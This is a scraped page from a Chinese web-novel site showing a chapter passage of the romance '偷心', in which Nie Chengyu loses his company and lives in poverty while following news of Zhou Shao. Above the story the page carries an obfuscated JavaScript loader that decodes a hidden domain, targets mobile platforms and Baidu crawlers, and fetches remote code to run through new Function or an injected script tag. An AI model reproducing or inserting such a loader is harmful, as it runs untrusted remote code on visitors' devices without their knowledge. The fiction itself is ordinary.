躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷阅读26(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

偷心 作者:面若满月

分卷阅读26

指引著他透露更多的问题,为什麽每次说到周少,容离眼里都会有那种捉摸不透的目光。

而最後的一幕,却定位在刚刚在周少别墅的那一幕上,那麽火热的吻,那麽激情的拥抱。

聂承语的心仿佛一下子空了,他没有感觉到欺骗,却有一种深深的无力浮上心头,就仿佛以前周少说过的那样──

聂承语,除了我,你身边还有人吗?

从头到尾,真心待他,不过周少一人而已。

而他,却不知道该怎麽面对周少,怎麽面对,可能与自己的前情人有肌肤之亲的周少。

也许,是永远的失去了。

聂承语提起箱子,踩过刚刚收拾好的小物,走向他人生的寒冬。

一月,得知索赔几乎无望,出让股份不动产以及各种有价证券填补一小部分亏损。

四月,媒体曝光正在筹建的市政项目使用不合格材料问题,因为涉及围标商业行贿等多个违法操作行为,聂承语公司主要几个资质被吊销,一批涉案人员纷纷被查,几个在建项目喊停。

十二月底,风波已过,聂承语免於牢狱之灾,却从此一文不名,蜗居於环北路棚户区。过去的几个月里,他几乎天天上报纸,幸好这里的人们奔波於温饱,没有闲心去关心报纸上的新闻。他找了份送报纸的工作,每天清晨四点起床,骑著车去送报纸,以微薄薪水度日。

他从这份流行於这座城市最普通阶层人民的报纸中,看到了很多消息,比如容离因为合约问题被雪藏,比如周氏的再一次全面扩张,还有,周少的众多花边新闻。

印象中,周少是从不去夜店的,可是现在,周少成了夜店的常客,各类女明星的绯闻对象,也传出了和某家名门出身的小姐,可能订婚的消息。

每天早上拿到报纸,他总是细细的翻到商业版或是娱乐版,细细的看著关於周少的每一条新闻,偶尔会有照片,他会留一份,他怕两人之间地位越来越远,他会忘记周少的样子。

有这样一个人,他能干,有著出色的家世和样貌,私下里脾气不太好,爱吃棉花糖,偶尔会撒撒娇,喜欢吃各种肉,一头卷毛软软的很好摸,他享受著被摸头的过程脸上却挂著一幅我很讨厌的样子。

就是这样一个人,占据了聂承语过去二十多年里的时光,不能磨灭,也无法复制。

聂承语躺在床上,看著报纸上周少的照片,嘴角扬起一丝微笑,在寒冷的冬夜里,在冰冷的泛著发霉味的小仓库里,身下的被褥单薄且潮湿,没有任何的取暖设备,这一张照片,却如一丝小火苗般让聂承语感受到了温暖。

窗外开始飘起雪花,远处,市中心树起了巨大的圣诞树,迎接著即将到来的新的一年。

☆、第二十二章 难以面对的偶遇

今年是一个寒冬,经过去年的一场大病,周少似乎对寒冷格外敏感起来,日子逐渐步入十二月,人也逐渐变得暴躁。

这是一种难以安抚的情绪,周少在房间里砌了一个小壁炉,也不太出去交际了,空闲时就依偎在壁炉边看看书。

说是看书,可是大多时间是在发呆,管家有时候会送报纸起来,周少这个习惯是入冬以来才养成的,报纸是普普通通的日报和晚报,报道的是普通市民们最关心的问题。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间
上一章
目录
下一页